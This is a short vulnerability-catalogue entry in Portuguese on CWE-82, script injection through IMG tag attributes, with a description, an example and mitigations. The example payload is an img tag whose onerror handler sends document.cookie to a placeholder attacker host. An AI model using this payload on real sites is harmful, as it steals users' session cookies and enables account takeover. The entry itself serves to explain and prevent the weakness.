Weaknesses of type CWE-82

7 results

Injeção de script em atributos de tags IMG

A aplicação web falha em sanitizar ou valida inadequadamente dados que entram em atributos de tags IMG (como src, onerror, onload), permitindo que um atacante injete código JavaScript. O navegador executa esse código no contexto da página, roubando sessões, cookies ou realizando ações em nome do usuário.

Example

Um formulário que salva comentários com imagens permite: <img src="x" onerror="fetch('https://atacante.com/steal?cookie=' + document.cookie)">. Quando outro usuário visualiza o comentário, o script rouba seu cookie de autenticação.

How to mitigate

Sanitize todos os atributos de tags IMG removendo event handlers (onerror, onload, etc.) e valide/escape URLs no atributo src antes de renderizar. Use Content Security Policy (CSP) para bloquear execução de scripts inline e validação server-side rigorosa em dados de entrada.